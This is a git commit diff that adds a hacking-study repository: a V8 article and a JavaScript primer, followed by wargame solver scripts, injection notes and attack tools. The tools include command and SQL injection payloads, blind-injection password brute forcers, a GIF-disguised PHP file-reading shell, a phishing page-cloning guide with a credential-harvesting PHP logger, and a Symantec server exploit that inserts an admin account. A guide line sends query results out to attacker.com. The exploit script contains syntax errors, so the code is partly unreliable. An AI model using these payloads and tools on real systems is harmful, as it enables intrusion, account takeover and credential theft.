add the stuff floating from other machines

This commit is contained in:
writer 2024-10-15 10:13:30 +09:00
parent 30e65244e2
commit 35788d79e2
252 changed files with 12374 additions and 603 deletions

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,191 @@
# A Closer Look at Chrome's Security: Understanding V8
[In 2008, Google released a sandbox-oriented browser](http://blogoscoped.com/google-chrome/), that was assembled from several different code libraries from Google and third parties (for instance, it borrowed a rendering machinery from the open-source [Webkit layout engine](https://www.webkit.org/), later changing it to a forked version, [Blink](http://en.wikipedia.org/wiki/Blink_(layout_engine))). Six years later, Chrome has become the preferred browser for [half of the users on the Internet](http://en.wikipedia.org/wiki/File:Usage_share_of_web_browsers_(Source_StatCounter).svg). In this post I investigate further how security is dealt with in this engine, and I summarize the main features of Chrome and its [Chromium Project](http://www.chromium.org/Home), describing the natural way of processing JavaScript with the **V8 JavaScript virtual machine**.
## They way computers talk...
In mainstream computer languages, a [source code in a ** high-level language** is transformed to a ** low-level language**](http://www.openbookproject.net/thinkcs/python/english2e/ch01.html) (a machine or assembly language) by either being **compiled** or **interpreted** . It is [a very simple concept](https://www.youtube.com/watch?v=_C5AHaS1mOA), but it is a fundamental one!
### Compilers and Interpreters
**Compilers** produce an intermediate form called **code object**, which is like machine code but augmented with symbols tables to make executable blocks (library files, with file objects). A linker is used to combine them to form executables finally.
**Interpreters** execute instructions without compiling into machine language first. They are first translated into a lower-level intermediate representations such as **byte code** or **abstract syntax trees** (ASTs). Then they are interpreted by a **virtual machine**.
The truth is that things are generally mixed. For example, when you type some instruction in Python's REPL, [the language executes four steps](http://akaptur.com/blog/2013/11/17/introduction-to-the-python-interpreter-3/): *lexing* (breaks the code into pieces), *parsing* (generates an AST with those pieces - it is the syntax analysis), *compiling* (converts the AST into code objects - which are attributes of the function objects), and *interpreting* (executes the code objects).
In Python, byte-compiled code, in the form of **.pyc** files, is used by the compiler to speed-up the start-up time (load time) for short programs that use a lot of standard modules. And, by the way, byte codes are attributes of the code object so to see them, you need to call ```func_code``` (code object) and ```co_code```(bytecode)[1]:
```py
>>> def some_function():
... return
...
>>> some_function.func_code.co_code
'd\x00\x00S'
```
On the other hand, traditional JavaScript code is represented as bytecode or an AST, and then executed in a *virtual machine* or further compiled into machine code. When JavaScript interprets code, it executes roughly the following steps: *parsing* and *preprocessing*, *scope analysis*, and *bytecode or translation to native*. Just a note: the JavaScript engine represents bytecode using [SpiderMonkey](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Internals/Bytecode).
So we see that when modern languages choose the way they compile or interpret code, they are trading off with the speed they want things to run. Since browsers are preoccupied with delivering content the faster they can, this is a fundamental concept.
### Method JITs and Tracing JITs
To speed things up, instead of having the code being parsed and then executed ([one at a time](http://en.wikipedia.org/wiki/Ahead-of-time_compilation)), **dynamic translators** (*Just-in-time* translators, or JIT) can be used. JITs *translate intermediate representation into machine language at runtime*. They have the efficiency of running native code with the cost of startup time plus increased memory (when the bytecode or AST are first compiled).
Engines have different policies on code generation, which can roughly be grouped into types: **tracing** and **method**.
**Method JITs** emit native code for every block (method) of code and update references dynamically. Method JITs can implement an *inline cache* for rewriting type lookups at runtime.
In **tracing JITs**, native code is only emitted when a certain block (method) is considered *important*. An example is given by traditional JavaScript: if you load a script with functions that are never used, they are never compiled. Additionally, in JavaScript a *cache* is usually implemented due to the nature of its *dynamic typing system*.
As we will see below, V8 performs direct JIT compilation from (JavaScript) source code to native machine code (IA-32, x86-64, ARM, or MIPS ISAs), **without transforming it to bytecode first**. In addition, V8 performs dynamic several optimizations at runtime (including **inline caching**). But let's not get ahead of ourselves! Also, as a note, Google has implemented a technology called [**Native Client**](http://code.google.com/p/nativeclient/) (NaCl), which allows one to provide compiled code to the Chrome browser.
----
## The way JavaScript rolls...
JavaScript's integration with [Netscape Navigator](http://en.wikipedia.org/wiki/Netscape_Navigator) in the mid-90s made it easier for developers to access HTML page elements such as *forms*, *frames*, and *images*. This was essential for JavaScript's accession to become the most popular scripting engine for the web.
However, the language's high dynamical behavior (that I'm briefly discussing here) came with a price: in the mid-2000s browsers had very slow implementations that did not scale with code size or *object allocation*. Issues such as *memory leaks* when running web apps were becoming mainstream. It was clear that things would only get worse and a new JavaScript engine was a need.
### JavaScript's Structure
In JavaScript, every object has a *prototype*, and a prototype is also an object. All JavaScript objects inherit their properties and methods from their prototype.
So, for example, supposing an application that has an object *Point* (borrowed from the [official documentation](https://developers.google.com/v8/design)):
```JavaScript
function Point(x,y){
this.x = x;
this.y = y;
}
```
We can create several objects:
```JavaScript
var a = new Point(0,1);
var b = new Point(2,3);
```
And we can access the propriety ```x``` in these object by:
```
a.x;
b.x;
```
In the above implementation, we would have two different Point objects that do not share any structure. This is because JavaScript is **classless**: you create new objects on the fly and dynamically add or remove proprieties. Functions can move from an object to another. Objects with the same type can appear in the same sites in the program with no constraints.
Furthermore, to store their object proprieties, most JavaScript engines use a *dictionary-like data structure*. Each property access demands a dynamic lookup to resolve their location in memory. This contrasts *static* languages such as Java, where instance variables are located at fixed offsets determined by the compiler (due to the *fixed* object layout by the *object's class*). In this case, access is given by a simple memory load or store (a single instruction).
### JavaScript's Garbage Collection
Garbage collection is a form of *automatic memory management*: an attempt to reclaim the memory occupied by objects that are not being used any longer (*i.e.*, if an object loses its reference, the object's memory has to be reclaimed).
The other possibility is *manual memory management*, which requires the developer to specify which objects need to be deallocated. However, manual garbage collection can result in bugs such as:
1. **Dangling pointers**: when a piece of memory is freed while there are still pointers to it.
2. **Double free bugs**: when the program tries to free a region of memory that it had already freed.
3. **Memory leaks**: when the program fails to free memory occupied by an object that had become unreachable, leading to memory exhaustion.
As one could guess, JavaScript has automatic memory management. Actually, the core design flaw of traditional JavaScript engines is **bad garbage collection behavior**. The problem is that JavaScript engines do not know exactly where all the pointers are, and they will search through the entire execution stack to see what data looks like pointers (for instance, integers can look like a pointer to an address in the heap).
------------
## Introducing V8
A solution for the issues presented above came from Google, with the **V8 Engine**. V8 is an [open source JavaScript engine](https://code.google.com/p/v8/) written in C++ that gave birth to Chrome. V8 has a way to categorize the highly-dynamic JavaScript objects into classes, bringing techniques from static class-based languages. In addition, as I mentioned in the beginning, V8 compiles JavaScript to native machine code before executing it.
In terms of performance, besides direct compilation to native code, three main features in V8 are fundamental:
1. Hidden classes.
2. In-line caching as an optimization technique.
3. Efficient memory management system (garbage collection).
Let's take a look at each of them.
### V8's Hidden Class
In V8, as execution goes on, objects that end up with the same properties will share the same **hidden class**. This way, the engine applies dynamic optimizations.
Consider the Point example from before: we have two different objects, ```a``` and ```b```. Instead of having them completely independent, V8 makes them share a hidden class. So instead of creating two objects, we have *three*. The hidden class shows that both objects have the same proprieties, and an object changes its hidden class when a new property is added.
So, for our example, if another Point object is created:
1. Initially, the Point object has no properties, so the newly created object refers to the initial class **C0**. The value is stored at offset zero of the Point object.
2. When property ```x``` is added, V8 follows the hidden class transition from **C0** to **C1** and writes the value of ```x``` at the offset specified by **C1**.
3. When property ```y``` is added, V8 follows the hidden class transition from **C1** to **C2** and writes the value of ```y``` at the offset specified by **C2**.
Instead of having a generic lookup for propriety, V8 generates efficient machine code to search the propriety. The machine code generated for accessing ```x``` is something like this:
```
# ebx = the point object
cmp [ebx, <class offset>], <cached class>
jne <inline cache miss>
mv eax, [ebx, <cached x offset>]
```
Instead of a complicated lookup at the propriety, the propriety reading translates into three machine operations!
It might seem inefficient to create a new hidden class whenever a property is added. However, because of the class transitions, the hidden classes can be reused several times. It turns out that most of the access to objects are within the same hidden class.
### V8's Inline caching
When the engine runs the code, it does not know about the hidden class. V8 optimizes property access by predicting that the class will also be used for all future objects accessed in the same section of code, and adds the information to the **inline cache code**.
Inline caching is a class-based object-oriented optimization technique employed by some language runtimes. The concept of inline caching is based on the observation that the objects that occur at a particular call site are often of the same type. Therefore, performance can be increased by storing the result of a method lookup *inline* (at the call site).
If V8 has predicted the property's value correctly, this is assigned in a single operation. If the prediction is incorrect, V8 patches the code to remove the optimization. To facilitate the process, call sites are assigned in four different states:
1. **Unitilized**: Initial state, for any object that was never seen before.
2. **Pre-monomorphic**: Behaves like an uninitialized but do a one-time lookup and rewrite it to the monophorfic state. It's good for code executed only once (such as initialization and setup).
3. **Monomphorpic**: Very fast. Recodes the hidden class of the object already seen.
4. **Megamorphic**: Like the initialized stub (since it always does runtime lookup) except that it never replaces itself.
In conclusion, the combination of using hidden classes to access properties with inline caching (plus machine code generation) does optimize in cases where the type of objects are frequently created and accessed in a similar way. This dramatically improves the speed at which most JavaScript code can be executed.
### V8's Efficient Garbage Collecting
In V8, a **precise garbage collection** is used. *Every pointer's location is known on the execution stack*, so V8 is able to implement incremental garbage collection. V8 can migrate an object to another place and rewire the pointer.
In summary, [V8's garbage collection](https://developers.google.com/v8/design#garb_coll):
1. stops program execution when performing a garbage collection cycle,
2. processes only part of the object heap in most collection cycles (minimizing the impact of stopping the application),
3. always knows exactly where all objects and pointers are in memory (avoiding falsely identifying objects as pointers).
-------------
## Further Readings:
* [Privacy And Security Settings in Chrome](https://noncombatant.org/2014/03/11/privacy-and-security-settings-in-chrome/)
[1] When the Python interpreter is invoked with the ```-O``` flag, optimized code is generated and stored in ***.pyo*** files. The optimizer removes assert statements.

View file

@ -0,0 +1,423 @@
# JavaScript: Crash Course
# Installing & Setting up
JavaScript (JS) is a dynamic computer programming language. Install [Google Dev Tools](https://developer.chrome.com/devtools/index) to proceed.
# JavaScript 101
To include your example.js in an HTML page (usually placed right before </body> will guarantee that elements are defined when the script is executed):
```
<script src="/path/to/example.js"></script>
```
Variables can be defined using multiple var statements or in a single combined var statement. The value of a variable declared without a value is undefined.
## Types in JavaScript
### Primitive:
- String
- Number
- Boolean
- null (represent the absence of a value, similar to many other programming languages)
- undefined (represent a state in which no value has been assigned at all)
### Objects:
```
// Creating an object with the constructor:
var person1 = new Object;
person1.firstName = "John";
person1.lastName = "Doe";
alert( person1.firstName + " " + person1.lastName );
// Creating an object with the object literal syntax:
var person2 = {
firstName: "Jane",
lastName: "Doe"
};
alert( person2.firstName + " " + person2.lastName );
Array
// Creating an array with the constructor:
var foo = new Array;
// Creating an array with the array literal syntax:
var bar = [];
If/Else
var foo = true;
var bar = false;
if ( bar ) {
// This code will never run.
console.log( "hello!" );
}
if ( bar ) {
// This code won't run.
} else {
if ( foo ) {
// This code will run.
} else {
// This code would run if foo and bar were both false.
}
}
```
### Flow Control
#### switch
```
switch ( foo ) {
case "bar":
alert( "the value was bar -- yay!" );
break;
case "baz":
alert( "boo baz :(" );
break;
default:
alert( "everything else is just ok" );
}
```
#### for
```
for ( var i = 0; i < 5; i++ ) {
// Logs "try 0", "try 1", ..., "try 4".
console.log( "try " + i );
}
```
#### while
```
var i = 0;
while ( i < 100 ) {
// This block will be executed 100 times.
console.log( "Currently at " + i );
i++; // Increment i
}
or
var i = -1;
while ( ++i < 100 ) {
// This block will be executed 100 times.
console.log( "Currently at " + i );
}
```
#### do-while
```
do {
// Even though the condition evaluates to false
// this loop's body will still execute once.
alert( "Hi there!" );
} while ( false );
```
### Ternary Operator
```
// Set foo to 1 if bar is true; otherwise, set foo to 0:
var foo = bar ? 1 : 0;
```
### Arrays
```
.length
var myArray = [ "hello", "world", "!" ];
for ( var i = 0; i < myArray.length; i = i + 1 ) {
console.log( myArray[ i ] );
}
.concat()
var myArray = [ 2, 3, 4 ];
var myOtherArray = [ 5, 6, 7 ];
var wholeArray = myArray.concat( myOtherArray );
.join()
// Joining elements
var myArray = [ "hello", "world", "!" ];
// The default separator is a comma.
console.log( myArray.join() ); // "hello,world,!"
// Any string can be used as separator...
console.log( myArray.join( " " ) ); // "hello world !";
console.log( myArray.join( "!!" ) ); // "hello!!world!!!";
// ...including an empty one.
console.log( myArray.join( "" ) );
.pop() and .push()
```
#### Remove or add last element
Extracts a part of the array and returns that part in a new array. This method takes one parameter, which is the starting index:
```
.reverse()
var myArray = [ "world" , "hello" ];
myArray.reverse(); // [ "hello", "world" ]
.shift()
var myArray = [];
myArray.push( 0 ); // [ 0 ]
myArray.push( 2 ); // [ 0 , 2 ]
myArray.push( 7 ); // [ 0 , 2 , 7 ]
myArray.shift(); // [ 2 , 7 ]
.slice()
```
#### Remove a certain amount of elements
Abd adds new ones at the given index. It takes at least three parameters:
* Index The starting index.
* Length The number of elements to remove.
* Values The values to be inserted at the index position.
```
var myArray = [ 0, 7, 8, 5 ];
myArray.splice( 1, 2, 1, 2, 3, 4 );
console.log( myArray ); // [ 0, 1, 2, 3, 4, 5 ]
.sort()
```
#### Sorts an array
It takes one parameter, which is a comparing function. If this function is not given, the array is sorted ascending:
```
// Sorting with comparing function.
function descending( a, b ) {
return b - a;
}
var myArray = [ 3, 4, 6, 1 ];
myArray.sort( descending ); // [ 6, 4, 3, 1 ]
.unshift()
```
#### Inserts an element at the first position of the array
```
.forEach()
function printElement( elem ) {
console.log( elem );
}
function printElementAndIndex( elem, index ) {
console.log( "Index " + index + ": " + elem );
}
function negateElement( elem, index, array ) {
array[ index ] = -elem;
}
myArray = [ 1, 2, 3, 4, 5 ];
// Prints all elements to the consolez
myArray.forEach( printElement );
// Prints "Index 0: 1", "Index 1: 2", "Index 2: 3", ...
myArray.forEach( printElementAndIndex );
// myArray is now [ -1, -2, -3, -4, -5 ]
myArray.forEach( negateElement );
```
### Strings
Strings are a primitive and an object in JavaScript.
Some methods:
* length
* charAt()
* indexOf()
* substring()
* split()
* toLowerCase
* replace
* slice
* lastIndexOf
* concat
* trim
* toUpperCase
### Objects
Nearly everything in JavaScript is an object arrays, functions, numbers, even strings - and they all have properties and methods.
```
var myObject = {
sayHello: function() {
console.log( "hello" );
},
myName: "Rebecca"
};
myObject.sayHello(); // "hello"
console.log( myObject.myName ); // "Rebecca"
The key can be any valid identifier:
var myObject = {
validIdentifier: 123,
"some string": 456,
99999: 789
};
```
### Functions
Can be created in many ways:
```
// Named function expression.
var foo = function() { ----> function expression (load later)
// Do something.
};
function foo() { ----> function declaration (load first)
// Do something.
}
If you declare a local variable and forget to use the var keyword, that variable is automatically made global.
Immediately -Invoked Function Expression:
(function() {
var foo = "Hello world";
})();
console.log( foo ); // undefined!
```
### Events
JavaScript lets you execute code when events are detected.
Example of code to change a source image:
```
windows.onload = init;
function init(){
var img = docuemnt.GetEventById("example");
img.src = "example.jpg"
```
Methods for events:
* click
* resize
* play
* pause
* load
* unload
* dragstart
* drop
* mousemove
* mousedown
* keypress
* mouseout
* touchstart
* touchend
### Closure
Closure is one of the main proprieties of JavaScript.
Example of closure for a counter. Normally we would have the code:
```
var count = 0;
function counter(){
count += 1;
return count
}
console.log(counter()); --> print 1
console.log(counter()); --> print 2
```
However, in JS we can enclose our counter inside an environment. This is useful for large codes, with multiple collaborations, for example, where we might use count variables more than once:
```
function makeCounter(){
var count = 0;
function counter(){
count += 1;
return count;
}
return counter; ----> closure holds count!
}
```
### Prototypes
```
function dog(name, color){
this.name = name;
this.color = color;
}
dog.prototype.species = "canine"
dog.prototype.bark = function{
}
```
### jQuery
Type Checking with jQuery:
```
// Checking the type of an arbitrary value.
var myValue = [ 1, 2, 3 ];
// Using JavaScript's typeof operator to test for primitive types:
typeof myValue === "string"; // false
typeof myValue === "number"; // false
typeof myValue === "undefined"; // false
typeof myValue === "boolean"; // false
// Using strict equality operator to check for null:
myValue === null; // false
// Using jQuery's methods to check for non-primitive types:
jQuery.isFunction( myValue ); // false
jQuery.isPlainObject( myValue ); // false
jQuery.isArray( myValue ); // true
```
---
Enjoy! This article was originally posted [here](https://coderwall.com/p/skucrq/javascript-crash-course).

View file

@ -0,0 +1,108 @@
# OS Command Injection
* Methodology:
- Identify data entry points
- Inject data (payloads)
- Detect anomalies from the response.
- Automate
* For example for snippet:
```
String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
Process proc = Runtime.getRuntime().exec(cmd);
```
For a client id equal **444**, we would have the following string:
```
cmd.exe /K processReports.bat clientId=444
```
However, an attacker could run use the client id equal **444 && net user hacked hackerd/add**. In this case, we have the following string:
```
cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
```
## Examples of Injection Payloads:
* Control characters and common attack strings:
- '-- SQL injection
- && | OS Command Injection
- <> XSS
* Long strings (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
* Binary or Null data
## Fuzz Testing Web Applications
* Focus on the relevant attack surface of the web application.
* Typically HTTP request parameters:
- QueryString
- POST data
- Cookies
- Other HTTP headers (User-Agent, Referer)
* Other entry points with request structures:
- XML web services
- WCF, GWT, AMF
- Remote Method Invocation (RMI)
* Fixing injection flaws:
- Comprehensive, consistent server-side input validation
- User Safe command APIs
- Avoid concatenating strings passed to an interpreter
- Use strong data types in favor of strings
### Whitelist input validation
- Input validated against known GOOD values.
- Exact match:
* A specific list of exact values is defined
* Difficult when large set of values is expected
- Pattern matching:
* Values are matched against known good input patterns.
* Data type, regular expressions, etc.
### Blacklist input validation
- Input validated against known BAD values.
- Not as effective as whitelist validation.
* Susceptible to bypass via encoding
* Global protection and therefore often not aware of context.
- Constantly changing given dynamic of application attacks.
#### Evading Blacklist filters
Exploit payloads:
```
';exec xp_cmdshell 'dir';--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
x+'p+'_+'c+'m+'d+s+'h+'e+'l+'l+'/**/+””+d+i'+r+””;exec(@cmd);--
```
```
;ex/**/ec xp_cmds/**/hell dir;--
```
```
Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHA
R(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+
CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CH
AR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
convert(varchar(0),0×78705F636D647368656C6C202764697227);exec(@cmd);--
```

View file

@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
print("Position %d: Trying %s ..." %(i, CHARS[j]))
r = requests.get( ( URL1 + password + CHARS[j] + URL2 ), auth=AUTH)
if 'bananas' not in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url
URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^'
URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search'
print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2))

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,5 @@
GIF89a
<?php
readfile('/etc/natas_webpass/natas14
');
?>

After

Width:  |  Height:  |  Size: 58 B

View file

@ -0,0 +1,31 @@
<?php
$cookie = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
function xor_encrypt($in){
$text = $in;
$key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print xor_encrypt($cookie);
function xor_encrypt_mod(){
$text = json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"));
$key = 'qw8J';
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print base64_encode(xor_encrypt_mod());
?>

View file

@ -0,0 +1,26 @@
# Phishing
* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original.
* Fake login/scamming pages which are often to hack identification information.
## Tools
### Cloning a Login Page
```
$ wget -U "Mozilla/5.0" -mkL http://facebook.com
```
### Free Hostings:
- http://www.my3gb.com/
- http://110mb.com/
- http://www.freehostia.com/
- http://www.awardspace.com/
- http://prohosts.org/
- http://www.000webhost.com/
- http://www.atspace.com/
- http://zymic.com/

View file

@ -0,0 +1,13 @@
<?php
header ('Location:http://www.gmail.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>

View file

@ -0,0 +1,43 @@
#!/usr/bin/env python
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
if __name__ = '__main__'
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status

212
Web_Hacking/SQLi/README.md Normal file
View file

@ -0,0 +1,212 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* SQL works by building query statements, these statements are intended to be readbale and intuitive.
* A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms.
* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.
* Exploitation:
- Dumping contents from the database.
- Inserting new data.
- Modifying existing data.
- Writing to disk.
## The Simplest Example
A parameter passed for a name of a user:
```
SELECT * FROM users WHERE
name="$name";
```
In this case, the attacker just needs to introduce a true logical expression like ```1=1```:
```
SELECT * FROM users WHERE 1=1;
```
So that the **WHERE** clause is always executed, which means that it will return the values that match to all users.
Nowadays it is estimated that less than 5% of the websites have this vulnerability.
These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
## Blind SQL Injection
* INFERENCE: useful technique when data not returned and/or detailed error messages disabled. We can differentiate between two states based on some attribute of the page response.
* It's estimated that over 20% of the websites have this flow.
* In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true.
* Timing-based techniques: infer based on delaying database queries (sleep(), waitfor delay, etc).
```
IF SYSTEM_USER="john" WAIFOR DELAY '0:0:15'
```
* Response-based techniques (True or False): infer based on text in response. Examples:
```
SELECT count (*) FROM reviews WHERE author='bob' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='1' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='2' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SYSTEM_USER='john' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='a' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='c' (true)
```
(and continue to iterate until finding the value of SYSTEM_USER).
* Utilize transport outside of HTTP response.
```
SELECT * FROM reviews WHERE review_author=UTL_INADDR.GET_HOST_ADDRESS((select user from dual ||'.attacker.com'));
INSERT into openowset('sqloledb','Network=DBMSSOCN; Address=10.0.0.2,1088;uid=gds574;pwd=XXX','SELECT * from tableresults') Select name,uid,isntuser from master.dbo.sysusers--
```
### Common ways of Exploitation
* Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another.
* In the example
```
http://www.website.com/info.php?id=10
```
the page *info.php* is receiving the data and will have some code like:
```
$id=$_post['id'];
```
and an associated SQL query:
```
QueryHere = "select * from information where code='$id'"
```
#### Checking for vulnerability
We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL:
```
http://www.website.com/info.php?id=10'
```
If the website returns the following error:
You have an error in your SQL syntax...
It means that this website is vulnerable to SQL.
#### Find the structure of the database
To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).
This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x.
* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to:
```
?id=5'%22union%22all%22select%221,2,3
```
* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name:
```
?id=5'%22union%22all%22select%221,2,3%22from%22admin
```
So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
```
$ ./sqlmap.py -u <WEBSITE> --dbs
(...)
[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:27] [WARNING] reflective value(s) found and filtering out
[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
(...)
```
#### Gaining access to the Database
* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the password are clear text (not hashed in md5, etc), we have access to the website.
## Basic SQL Injection Exploit Steps
1. Fingerprint database server.
2. Get an initial working exploit. Examples of payloads:
- '
- '--
- ')--
- '))--
- or '1'='1'
- or '1'='1
- 1--
3. Extract data through UNION statements:
- NULL: use as a column place holder helps with data type conversion errors
- GROUP BY - help determine number of columns
4. Enumerate database schema.
5. Dump application data.
6. Escalate privilege and pwn the OS.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate functions such as:
- is_numeric()
- ctype_digit()
- settype()
- addslahes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
- mysql_real_escape_string()
- sqlit_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always perform a parse of data that is received from the user (POST and FORM methods).
- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request. They can help fingerprint the RDBMS(MSSQL, MySQL).
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.

View file

@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
print r.url
if KEYWORD in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
